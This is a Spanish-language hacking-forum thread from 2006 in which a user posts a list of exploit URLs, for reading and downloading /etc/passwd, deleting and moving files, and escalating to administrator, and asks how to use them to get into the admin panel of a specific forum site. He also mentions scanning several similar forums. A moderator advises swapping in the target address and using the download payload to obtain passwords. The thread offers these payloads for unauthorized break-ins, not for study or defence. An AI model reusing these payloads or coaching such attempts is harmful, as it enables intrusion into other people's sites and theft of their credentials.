Nuevas NORMAS para el foro

Curso Hacker
Bienvenido(a), Visitante. Favor de ingresar o registrarse.
¿Perdiste tu email de activación? - Agosto 30, 2008, 09:55:36
Boton Buscar
Inicio Ayuda Ingresar Registrarse
Visita: Articulos - Juegos Gratis - Da Foros

Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderador: OzX)  |  Tema: Ayudenme con este exploit 0 Usuarios y 1 Visitante están viendo este tema. « anterior próximo »
Páginas: [1] Ir Abajo Imprimir
Autor Tema: Ayudenme con este exploit  (Leído 336 veces)
InfinityCodes
Recien Llegado
*
Desconectado Desconectado

Mensajes: 12


Ver Perfil WWW
« en: Octubre 15, 2006, 09:13:45 »
esto lo saque para esta pagina
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
http://z10.invisionfree.com/Foro_MaestRO


a ver si me echan una mano para usar este exploit que me salio despeus del scan con SSS

Código:
File disclosure:
http://www.example.com/src/read_body.php?mailbox=/etc/passwd&passed_id=1&

File deletion:
http://www.example.com/src/delete_message.php?mailbox=[filehere]&message=1

File moving:
http://www.example.com/src/move_messages.php?msg=1&mailbox=[file_you_want_to_move]&startMessage=1&targetMailbox=[target_mailbox_here]

File download:
http://www.example.com/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd

Privilege escalation:
http://www.example.com/plugins/administrator/options.php?username="root"&adm_Group1=//Find it from file:plugins/administrator/admins//&off=true&key=$

creo que debo usar el ultimo para lograr tener acceso al admin panel....

corrijanme si me equivoco....avisenme cualquier cosa....la idea es que logre entrar como admin graxe...
En línea

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
www.darkcode.mihost.org
OzX
Moderadores
Gran Colaborador
*****
Desconectado Desconectado

Mensajes: 2066


www.nullbytes.net


Ver Perfil WWW
« Respuesta #1 en: Octubre 15, 2006, 11:29:37 »
s todo un procedimiento..
en cada
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
www.example.com
la cambias por la direccion de la pagina web


File download:

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion este te podria servir.. es bajar bajar talves las password..

lo q no entiendo es esto del ultimo /Find it from file... pero podrias decir que tipo de exploit es
En línea

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
www.NULLBYTES.Net
Pr0gr4mer
Colaborador
*****
Desconectado Desconectado

Mensajes: 865


Pr0gr4mer al mango


Ver Perfil WWW
« Respuesta #2 en: Octubre 16, 2006, 12:43:26 »
En línea



 Tu respuesta esta dandole click al
Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
San Buscador


 .::Pr0gr4mer::.
InfinityCodes
Recien Llegado
*
Desconectado Desconectado

Mensajes: 12


Ver Perfil WWW
« Respuesta #3 en: Octubre 16, 2006, 03:29:34 »
Gracias, pero supuse que funcionaban asi...pero lamentablemente sigo sin entrar al panel como admin....es raro pero no me funciona....

a ver si prueban este exploit con cualqueir foro hecho con invisionFree 1.3(he scaneado  5 de estos y siempre sale la misma vulnerabilidad...he seguido lso pasos de los tutos...pero sigo llegando hata ahi...y no puedo usar este exploit....aver si ha alguien le funciona....o me recominado otro exploit...ya que todas las demas vulnes que aparecen se explotan de una manera muy similiar...pero no me resulta...

a ver si me ayudan ....en todo caso muchas gracias...por la rapida respuesta de ambos...
En línea

Para ver los enlaces debes ser usuario Crear Usuario o Hacer Sesion
www.darkcode.mihost.org
Páginas: [1] Ir Arriba Imprimir 
Comunidad Underground Hispana  |  Phreaking, Hacking y Seguridad  |  Bug y Exploits (Moderador: OzX)  |  Tema: Ayudenme con este exploit « anterior próximo »
Ir a:  


Ranking-Hits
Powered by SMF 1.1.5 | SMF © 2006-2007, Simple Machines LLC